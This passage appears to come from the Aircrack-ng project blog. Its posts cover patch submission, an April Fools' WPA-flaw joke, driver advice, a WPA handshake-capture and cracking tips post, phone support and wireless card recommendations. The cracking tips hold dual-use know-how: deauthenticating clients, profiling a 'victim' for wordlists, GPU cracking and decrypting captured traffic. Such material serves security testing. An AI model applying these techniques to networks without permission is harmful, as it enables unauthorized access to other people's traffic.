Once you're done, you have to create a difference (or a patch, that's the same thing). Thanks to subversion, it is very easy to do: just issue 'svn diff > PATCH_FILE.diff' and you're done.
Important note: If your changes added files, make sure to do a 'svn add' for each of them. If you don't do it, the added files won't be included in the patch.

Once you're done all that, you can create a new ticket on our trac, fill all the fields (if you are not sure how to fill some of them, don't worry, I'll do it) and attach the patch. If you have any issue doing so, feel free to shoot me an email with all the details, I'll post it.
If you have several patches and they need to be applied in a specific order (affecting the same file), add a number in front of the name of the patch so that I know how to apply them or explain the order of the patches in the ticket.

That's it :)

If you have other questions, post them in the comments, and I'll update this post to address them.

Sunday, April 1, 2012

WPA Flaw let us crack the PMK in a few minutes - April Fools'

Today we are very proud to announce the we found a flaw that let us crack WPA in just a few minutes no matter what the passphrase length is. Obviously, we don't get the passphrase but the PMK (which is 'derived' from the ESSID and the passphrase), the master key which is more than enough to decrypt a capture file; Airdecap-ng allows to decrypt a pcap file with either the passphrase or the PMK (using -k).

I'm sorry, I wish I had more time to write a longer post to give more technical details but right now I'm very busy writing the paper. It will be published here probably tomorrow.

And in case you wonder, it will be integrated into Aircrack-ng ;)

If you really want to read the paper, there you go.

Thursday, March 8, 2012

Compat-wireless

We have at least 2 or 3 times a day on IRC the questions about compiling drivers (and more in the forum) and we always say that you have to patch them like explained in the wiki.

As said thousand of times (I just want to avoid having to say it again in the future), you should ALWAYS take the latest compat-wireless version NO MATTER what your kernel version is.

Compat-wireless version is related to the kernel version in a way that it has the features a kernel version has. So, there is no point in taking the same version as your kernel because all you will do is having the  features (and not fix anything) that you already had in your kernel (minus the patches from your distro if any were applied).

Compat-wireless with dates (instead of version) is the most up to date and it comes from git. So if you are not a developer (who wants to debug/work with them), then you should not use these.

You can get much more details (and downloads) on Linux Wireless website.

To summarize (or if you don't want to read anything else in this post): ALWAYS take the latest version of compat-wireless (don't take the one with dates).

Sunday, February 19, 2012

WPA cracking tips and tricks

WPA cracking is at the same time easy and hard to crack. It is quite easy because all you need is getting the handshake (with WEP, you need a lot of data frames). It is hard because getting the handshake can be tricky and also because cracking can take a lot of time (due to passphrase length, 8 to 63 characters).

Important notes:
  • Never forget to read the documentation in the wiki
  • Don't hack AP you don't own or if you don't have the permission to do it.


There are several things to consider when getting the handshake:
  • You need to be somehow close to both the AP and the client. If you only have the client, you should use airbase-ng to get the client to connect to you.
  • If RXQ is below 70 then there is a good chance you'll get a partial handshake which will be unusable.
  • You MUST be on the same channel as the AP (in airodump-ng, you will see RXQ column when on a fixed channel)
  • It is not necessary to keep deauthenticating the client, once or twice should be more than enough. And let the client reconnect in order to get the handshake. Each aireplay-ng tells you it sent deauthentication, it sent 128 or 256 deauth frames.
 If you still don't get the handshake after reading the wiki and those tips, then you might want to have a look at WPA Packet Capture Explained tutorial in the wiki to help understand what's going on.

Tip: It is always a good idea to clean up the capture to include one beacon the handshake before cracking it or submitting it to an online cracking service. The reason is that YOU select the handshake to crack and don't let the tool on those services to select the handshake (that might be the wrong one).

It might sound funny but it is true, there is 0% chances to crack it if the passphrase is not in the dictionary (and 100% when it is in the dictionary). So what you want to do is profiling your victim when cracking the handshake to include words/phrases related to it. You can also find a few tools on backtrack such as John The Ripper that will help you mangle the dictionary and "add" new words.
If you need to generate phrases such as number, check out 'crunch'.
Note that aircrack-ng doesn't mangle the wordlist and doesn't do any permutation, it just tries each passphrase against the handshake. And in case you want to be able to 'pause' the cracking, use John The Ripper to output to stdout and pipe the results to aircrack-ng (using -w -).
GPU cracking makes cracking much faster. One of the best solution for that is oclHashcat-plus (and it is much faster than pyrit).

Now that you've cracked the handshake, you might want to verify it. People have been trying to connect to the AP but it is the wrong way of checking since there are a lot of variables involved (such as distance, mac filtering, bad drivers, etc) that will prevent you to connect even if the passphrase is valid.
So what you have to do is using airdecap-ng.
With WPA, since what you get with the handshake is a session key for a specific device, you can only decrypt the traffic after the handshake for that device. Don't be fooled by airdecap-ng giving 0 frames decrypted when there are a few data frames encrypted with WPA, there might not be any traffic from that device after the handshake. Hence why it is very important to be able to understand a capture file.

Saturday, February 11, 2012

Aircrack-ng on phones (Android, iPhone and others)

I've often seen questions like "How can I get Aircrack-ng on my iPhone/Android/Symbian/[ADD YOUR OS]?". Let me clarify the status for phones.

In order to have Aircrack-ng running on the phone, there are several requirements:

  1. Being able to cross compile (because the CPU on your phone has a different architecture than the one on your computer). So if you cannot find a cross compiler for that specific platform, forget it.
  2. A wireless card. Most phones have one these days, so that's easy.
  3. If your phone is Linux based, you will also need to be able to be 'root' to run the commands.
  4. The driver must allow monitor mode. That's usually where almost all phones fail because only a few have that. Sometimes the card doesn't have a stable monitor mode. The reason behind it is that it must be low power (and cheap to manufacture) so the chipset (and its firmware) is very limited.

To give you a quick answer, only one phone meets all the requirements with its internal card: the Nokia N900 (it needs the 'power' kernel available in the extra-devel repositories). While doing monitor mode/injection, the battery last about 4h.

  • iOS devices: Forget it because it is never going to happen, Apple is consumer oriented and doesn't really care about the computer security industry. Plus,  iOS is too closed source and AFAIK the chipset is not capable of proper monitor mode. You could argue that it is available via Cydia. It's true but you don't have any monitor mode capabilities, so it doesn't worth it (also don't bother sending me Cydia bug reports, I don't read them).
  • Android: Forget it with the internal card. However, it will be possible with an external USB card. Dragorn, the author of Kismet Wireless is working on it.
  • Other OS: Forget it (for the same reasons as Apple).

Saturday, January 28, 2012

Best card (or best laptop/netbook) for Aircrack-ng

After a long time and no updates on the blog, I'm back. I hope to keep it active like before.

One of the question I see asked very often is "what card should I use for Aircrack-ng?" or "what laptop should I use?".

As far as card goes, I can tell you that even though the wiki looks outdated (it isn't updated because the information is still accurate), the Alfa AWUS036H (Realtek 8187) is still a very good card. Another very good one is the Rockland N3 (Ralink chipset).
If you would like to capture and inject on 802.11n networks, you can use a card compatible with carl9170 (I use a Netgear WNDA3100 v1).
Correct me if I'm wrong but I haven't been successful with new Ralink cards even though they support 802.11n, something is missing in the driver to be able to have that capability in monitor mode.
There might be other compatible chipsets for 802.11n (maybe recent Intel cards) but I haven't tested them so I can't confirm.

So, now about laptops and netbooks. One of the best chipset for internal cards is still Atheros.
You can try getting a laptop with Atheros cards but it is not easy to find since vendors don't often advertise what card they use and in most cases it is because they use a Broadcom (which are far from being the best cards). When they do, it is usually an Intel.
So what I recommend about laptops and netbooks: Get one that you like and you're comfortable with, don't worry about the wireless card that comes with it and use one of the cards mentioned above.
If you really want an internal card, you can replace the internal card with an Ubiquiti but keep in mind that some laptops have a BIOS lock that prevents using another card than the (overpriced) one they sell. HP/Compaq is known to do it. I've heard Dell does it on some laptops too. I don't know for others.

Another thing I've often seen is people who wants to get cards from local stores. In my experience, local store 1. don't have a lot of choices 2. don't know what chipset their cards have and 3. don't really care about it. That's why I always shop online for wireless cards. There is a good chance you can find a compatible card on Amazon or eBay.

I'll cover phones and Access points in another post.